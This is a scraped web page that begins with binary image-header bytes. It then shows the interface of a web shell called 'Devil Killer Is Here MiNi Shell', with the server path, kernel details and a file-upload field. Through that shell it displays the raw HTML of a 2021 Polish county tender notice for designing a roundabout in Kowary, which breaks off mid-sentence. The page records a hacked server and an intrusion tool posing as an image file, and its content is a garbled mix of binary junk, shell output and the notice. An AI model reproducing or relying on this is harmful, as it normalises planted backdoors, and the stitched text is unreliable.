JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211027/0024716201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Opracowanie dokumentacji projektowo-kosztorysowej na przebudowę skrzyżowania dróg wojewódzkich nr 366 i 367 z drogą powiatową nr 2735D w Kowarach na skrzyżowanie o ruchu okrężnym” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Karkonoski - Starostwo Powiatowe w Jeleniej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821492</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kochanowskiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">756473102</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@powiatkarkonoski.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.powiatkarkonoski.eu/5918</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Opracowanie dokumentacji projektowo-kosztorysowej na przebudowę skrzyżowania dróg wojewódzkich nr 366 i 367 z drogą powiatową nr 2735D w Kowarach na skrzyżowanie o ruchu okrężnym” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b450fcff-36f0-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00247162</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007061/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Opracowanie dokumentacji projektowo-kosztorysowej na przebudowę skrzyżowania dróg wojewódzkich nr 366 i 367 z drogą powiatową nr 2735D w Kowarach (na skrzyżowania o ruchu okrężnym)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.powiatkarkonoski.eu/7721/dokument/13909 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcamiodbywasięprzyużyciuśrodkówkomunikacjielektr.,tj. miniPortalu(https://miniportal.uzp.gov.pl/),ePUAPu(https://epuap.gov.pl/wps/portal lub https://obywatel.gov.pl/nforms/ezamowienia), a także poczty elektronicznej(bzp@powiatkarkonoski.eu),przyczym pocztaelektroniczna nie jest właściwa dla składania ofert oraz dokumentów i oświadczeń stanowiących załączniki do oferty. 2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz„Formularz do komunikacji”.3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektr., elektr. kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal (https://miniportal.uzp.gov.pl/WarunkiUslugi)oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej(ePUAP – https://www.gov.pl/web/gov/warunki-korzystania).Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w w/w Regulaminie oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu. 4.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” i„Formularza do komunikacji”wynosi 150 MB.W przypadku komunikacji z Zamawiającym za pośrednictwem poczty elektr., wielkość plików przesyłanych jednorazowo wynosi maksymalnie 20 MB(bez względu na ilość załączników). 5.Zasady komunikowania się(nie dotyczy składania ofert i Ogłoszenie nr 2021/BZP 00224758/01 z dnia 2021-10-07 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu Zamówienie udzielane jest w trybie podstawowym na podstawie: art.275 pkt2 ustawy Roboty budowlane zał. do oferty):1) we wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia(BZP) lub ID postępowania z miniPortalu. Zamawiający podaje identyfikator(ID) postępowania na miniPortalu jako Zał.Nr9 do SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki „Postępowania”; 2)w postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami,w szczególności składanie dokumentów i oświadczeń(innych niż oferta Wykonawcy oraz załączniki do oferty w tym oświadczenie, o którym mowa w art.125 ust.1 ustawy Pzp),zawiadomień oraz przekazywanie informacji odbywa się elektr. za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal(„Formularz do komunikacji”). Zamawiający dopuszcza również komunikowanie się z Wykonawcami(w tym składania dokumentów innych niż oferta oraz załączniki do oferty w tym oświadczenie, o którym mowa w art.125 ust.1 ustawy Pzp)za pomocą poczty elektr.(pod adresem e-mail: bzp@powiatkarkonoski.eu); 3)Dokumenty elektroniczne składane są przez Wykonawcę za pośrednictwem„Formularza do komunikacji”jako załączniki i nie mogą być szyfrowane.Zamawiający dopuszcza również możliwość składania dokumentów elektr. za pomocą poczty elektronicznej, na adres email wskazany w pkt2. 6.Adres skrzynki podawczej Zamawiającego(Elektroniczna Skrzynka Podawcza Starostwo Powiatowe w Jeleniej Górze): /7s2scta34v/SkrytkaESP.7.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób, niż przy użyciu środków komunikacji elektronicznej z zastrzeżeniem sposobu prowadzenia negocjacji w celu ulepszenia treści ofert,zgodnie z art.289 ust.5 ustawy Pzp.8 Do przygotowania oferty konieczne jest posiadanie przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektr., podpisu osobistego lub podpisu zaufanego.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">http://bip.powiatkarkonoski.eu/7721/dokument/13909</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny, o którym<br/>mowa w art. 13 ust. 1 i 3 RODO w dokumentach zamówienia (SWZ - Dział XXXIX)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny, o którym<br/>mowa w art. 19 ust. 4 ustawy Pzp w dokumentach zamówienia (SWZ - Dział XXXIX)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.272.1.17.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 724927,67 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 80400,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej na<br/>przebudowę skrzyżowania dróg wojewódzkich nr366 i 367 z drogą powiatową nr2735D w<br/>Kowarach na skrzyżowanie o ruchu okrężnym (Gmina Kowary, Powiat<br/>Karkonoski).2.Zamówienie realizowane jest w związku z Porozumieniem nr DSDIK/21/2021 w<br/>sprawie powierzenia do realizacjiPowiatowi Karkonoskiemu zadania własnego Województwa<br/>Dolnośląskiego„Przebudowa skrzyżowania dróg wojewódzkich nr366 i 367 z drogą powiatową<br/>nr2735D w Kowarach na skrzyżowanie o ruchu okrężnym” zawartym w dniu 27.05.2021r.<br/>pomiędzy Powiatem Karkonoskim i Województwem Dolnośląskim3.Zakres wykonania<br/>dokumentacji projektowo-kosztorysowej dla tego zadania obejmuje wykonanie: a)inwentaryzacji<br/>stanu istniejącego;b)co najmniej 2 koncepcji/wariantów przebudowy skrzyżowania typu<br/>rondo;c)projektu architektoniczno-budowlanego oraz technicznego niezbędnego do realizacji<br/>prac uwzględniających: przebudowę skrzyżowania zwykłego na skrzyżowanie typu rondo;<br/>przebudowę zjazdów; przebudowę i uciąglenie chodnika prowadzącego z centrum Kowar w<br/>stronę osiedla Wojków; przebudowę sieci oświetlenia ulicznego; przebudowę systemu<br/>odwodnienia; likwidację kolizji z istniejącymi elementami infrastruktury i zagospodarowania<br/>terenu;d)projektu podziału nieruchomości wraz z jego uzgodnieniem (o ile zajdzie taka<br/>potrzeba), e)specyfikacji technicznych wykonania i odbioru robót dla każdej branży zawartej w<br/>dokumentacji,f)przedmiarów robót dla każdej branży zawartej w dokumentacji, g)kosztorysów<br/>inwestorskiech dla wszystkich projektowanych branż, h)opinii geotechnicznej (dokumentacji<br/>geologiczno-inżynierskiej, o ile będzie zachodziła taka potrzeba), i)operatu wodno-prawnego<br/>wraz z decyzją lub skutecznego zgłoszenia wodnoprawne (o ile będzie zachodziła taka<br/>potrzeba), j)projektu organizacji ruchu docelowego (wraz zatwierdzeniem), k)projektu organizacji<br/>ruchu tymczasowego (wraz zatwierdzeniem).4.Wykonawca zobowiązany jest dostosować<br/>zakres dokumentacji projektowo-kosztorysowej, o której mowa w pkt 3, do planowanej<br/>procedury uzyskania skutecznego jej zatwierdzenia w celu realizacji robót budowlanych, tj.<br/>uzyskania pozwolenia na budowę (PnB) / uzyskania decyzji o zezwoleniu na realizację inwestycji<br/>drogowej (ZRiD). Ostateczny zakres dokumentacji projektowo-kosztorysowej oraz wskazanie<br/>procedury uzyskania skutecznego jej zatwierdzenia zależne będą od wybranego przez<br/>Zamawiającego wariantu przebudowy skrzyżowania, o którym mowa w pkt1. 5.Zgodnie z<br/>zapisami Porozumienia, o którym mowa w pkt2, zlecona do opracowania w ramach niniejszego<br/>zamówienia dokumentacja projektowo-kosztorysowa podlegać będzie uzgodnieniu przez<br/>Dolnośląską Służbę Dróg i Kolei we Wrocławiu (DSDiK) na każdym z założonych etapów<br/>realizacji zamówienia: a)etap wstępnych prac projektowych, w trakcie których Wykonawca<br/>przygotuje i przedłoży Zamawiającemu co najmniej 2 (dwie) koncepcje/warianty przebudowy<br/>skrzyżowania typu rondo, spośród których wybrana zostanie do realizacja 1 (jedna)<br/>koncepcja/wariant; b)etap opracowania projektu architektoniczno – budowlanego oraz<br/>sporządzenia wniosku O pozwolenie na budowę / wniosku o uzyskanie decyzji ZRiD; c)etap<br/>sporządzenia przedmiarów i kosztorysów oraz specyfikacji technicznych podczas opracowania<br/>projektu technicznego. Szczegółowy opis przedmiotu zamówienia, został zawarty w Załączniku<br/>Nr 8 do SWZ. Szczegółowy opis stanowi Załącznik nr 8 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Najkorzystniejsza oferta to oferta przedstawiająca najkorzystniejszy<br/>stosunek jakości do ceny.<br/>2. Najkorzystniejsza oferta zostanie wybrana na podstawie następujących kryteriów oceny ofert:<br/>1) Kryterium I – CENA – 60 %;<br/>2) Kryterium II – TERMIN WYKONANIA ZAMÓWIENIA – 40 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN WYKONANIA ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt<br/>4 ustawy Pzp;<br/>2) spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>d) zdolności technicznej lub zawodowej:<br/>Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże,<br/>że dysponuje co najmniej jedną osobą, która będzie pełnić funkcję projektanta przy realizacji<br/>przedmiotowego zamówienia, uprawnioną<br/>do wykonywania samodzielnych funkcji technicznych w budownictwie, posiadającą uprawnienia<br/>budowlane do projektowania w specjalności inżynieryjnej drogowej w co najmniej ograniczonym<br/>zakresie<br/>albo w specjalności konstrukcyjno-budowlanej bez ograniczeń, wydane<br/>na podstawie przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz.<br/>Ogłoszenie nr 2021/BZP 00224758/01 z dnia 2021-10-07<br/>2021-10-07 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>1333 z późn. zm.) lub odpowiadające<br/>im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących<br/>przepisów.<br/>W zakresie uprawnień budowlanych Zamawiający dopuszcza kwalifikacje zawodowe nabyte w<br/>innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej oraz państwach członkowskich Europejskiego Porozumienia o Wolnych Handlu<br/>(EFTA) – stronach umowy o Europejskim Obszarze Gospodarczym – na zasadach określonych<br/>w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz. 1333 z późn.<br/>zm.) – z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020<br/>r. poz. 220 z późn. zm.).<br/>2. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne<br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>3. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:<br/>Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie<br/>zamówienia, o których mowa w art. 112 ust. 2 pkt 4 ustawy Pzp, oraz niepodlegania wykluczeniu<br/>z postępowania z uwagi na wystąpienie okoliczności, o których mowa<br/>w art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp, zostanie dokonana zgodnie z formułą<br/>„spełnia/nie spełnia”, w oparciu o informacje zawarte w wymaganych oświadczeniach<br/>i podmiotowych środkach dowodowych, o których mowa w Dziale XIII SWZ. Oświadczenia i dokumenty oceniane będą pod względem ich aktualności i treści. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wraz z ofertą składaną w odpowiedzi na ogłoszenie o zamówieniu,<br/>należy złożyć następujące oświadczenia i dokumenty:<br/>1) aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków<br/>udziału w postępowaniu, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp (wzór stanowi Załącznik Nr 2 do SWZ);<br/>2) w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców – w odniesieniu do<br/>warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia – oświadczenie, o<br/>którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynikać będzie, które usługi wykonają<br/>poszczególni Wykonawcy (wzór stanowi Załącznik Nr 7 do SWZ),<br/>3) w przypadku, gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby –<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych<br/>zasobów na potrzeby realizacji zamówienia (wzór stanowi Załącznik Nr 3 do SWZ) lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca (realizując zamówienie) będzie<br/>dysponował niezbędnymi zasobami podmiotów udostępniających zasoby;<br/>4) w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania – odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>5) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy<br/>albo Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp – jeżeli umocowanie do<br/>reprezentowania przez osobę działającą w imieniu Wykonawcy albo Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia albo podmiotu udostępniającego zasoby nie wynika z<br/>dokumentów, o których mowa w pkt 4.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym<br/>mowa w ust. 1 pkt 1, składa każdy z tych Wykonawców – w celu potwierdzenia braku podstaw<br/>wykluczenia oraz spełniania warunków udziału w postępowaniu – w zakresie, w jakim każdy z tych<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. W przypadku polegania przez Wykonawcę na zdolnościach podmiotów udostepniających zasoby na<br/>zasadach określonych w art. 118 ustawy 